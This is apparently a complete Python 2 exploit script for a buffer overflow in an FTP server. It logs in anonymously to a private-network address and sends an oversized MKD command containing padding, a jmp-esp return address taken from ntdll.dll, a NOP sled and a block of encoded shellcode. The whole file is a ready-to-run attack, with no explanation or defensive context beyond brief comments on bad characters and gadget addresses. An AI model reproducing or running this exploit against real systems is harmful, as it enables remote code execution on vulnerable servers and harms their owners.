#!/usr/bin/python

import socket
import sys

#------------------------------------------
#Badchars: \x00\x0A\x0D
#0x77c35459: push esp # ret | shell32.dll
#0x7C5a8265: jmp esp # ret | ntdll.dll
#------------------------------------------
shellcode = ("\xd9\xce\xd9\x74\x24\xf4\x58\xbd\xcd\x94\xae\xab\x2b\xc9\xb1"
"\x56\x31\x68\x18\x03\x68\x18\x83\xe8\x31\x76\x5b\x57\x21\xfe"
"\xa4\xa8\xb1\x61\x2c\x4d\x80\xb3\x4a\x05\xb0\x03\x18\x4b\x38"
"\xef\x4c\x78\xcb\x9d\x58\x8f\x7c\x2b\xbf\xbe\x7d\x9d\x7f\x6c"
"\xbd\xbf\x03\x6f\x91\x1f\x3d\xa0\xe4\x5e\x7a\xdd\x06\x32\xd3"
"\xa9\xb4\xa3\x50\xef\x04\xc5\xb6\x7b\x34\xbd\xb3\xbc\xc0\x77"
"\xbd\xec\x78\x03\xf5\x14\xf3\x4b\x26\x24\xd0\x8f\x1a\x6f\x5d"
"\x7b\xe8\x6e\xb7\xb5\x11\x41\xf7\x1a\x2c\x6d\xfa\x63\x68\x4a"
"\xe4\x11\x82\xa8\x99\x21\x51\xd2\x45\xa7\x44\x74\x0e\x1f\xad"
"\x84\xc3\xc6\x26\x8a\xa8\x8d\x61\x8f\x2f\x41\x1a\xab\xa4\x64"
"\xcd\x3d\xfe\x42\xc9\x66\xa5\xeb\x48\xc3\x08\x13\x8a\xab\xf5"
"\xb1\xc0\x5e\xe2\xc0\x8a\x36\xc7\xfe\x34\xc7\x4f\x88\x47\xf5"
"\xd0\x22\xc0\xb5\x99\xec\x17\xb9\xb0\x49\x87\x44\x3a\xaa\x81"
"\x82\x6e\xfa\xb9\x23\x0e\x91\x39\xcb\xdb\x36\x6a\x63\xb3\xf6"
"\xda\xc3\x63\x9f\x30\xcc\x5c\xbf\x3a\x06\xeb\x87\xf4\x72\xb8"
"\x6f\xf5\x84\x19\x74\x70\x62\x0f\x64\xd4\x3c\xa7\x46\x03\xf5"
"\x50\xb8\x61\xa9\xc9\x2e\x3d\xa7\xcd\x51\xbe\xed\x7e\xfd\x16"
"\x66\xf4\xed\xa2\x97\x0b\x38\x83\xde\x34\xab\x59\x8f\xf7\x4d"
"\x5d\x9a\x6f\xed\xcc\x41\x6f\x78\xed\xdd\x38\x2d\xc3\x17\xac"
"\xc3\x7a\x8e\xd2\x19\x1a\xe9\x56\xc6\xdf\xf4\x57\x8b\x64\xd3"
"\x47\x55\x64\x5f\x33\x09\x33\x09\xed\xef\xed\xfb\x47\xa6\x42"
"\x52\x0f\x3f\xa9\x65\x49\x40\xe4\x13\xb5\xf1\x51\x62\xca\x3e"
"\x36\x62\xb3\x22\xa6\x8d\x6e\xe7\xd6\xc7\x32\x4e\x7f\x8e\xa7"
"\xd2\xe2\x31\x12\x10\x1b\xb2\x96\xe9\xd8\xaa\xd3\xec\xa5\x6c"
"\x08\x9d\xb6\x18\x2e\x32\xb6\x08")

buffer = "\x90"*20 + shellcode

evil = "A"*247 + "\x65\x82\xa5\x7c" + buffer + "C"*(749-len(buffer))
print 247+4+(749-len(buffer))+len(buffer)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.2.130",21))

s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS a@a\r\n")
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

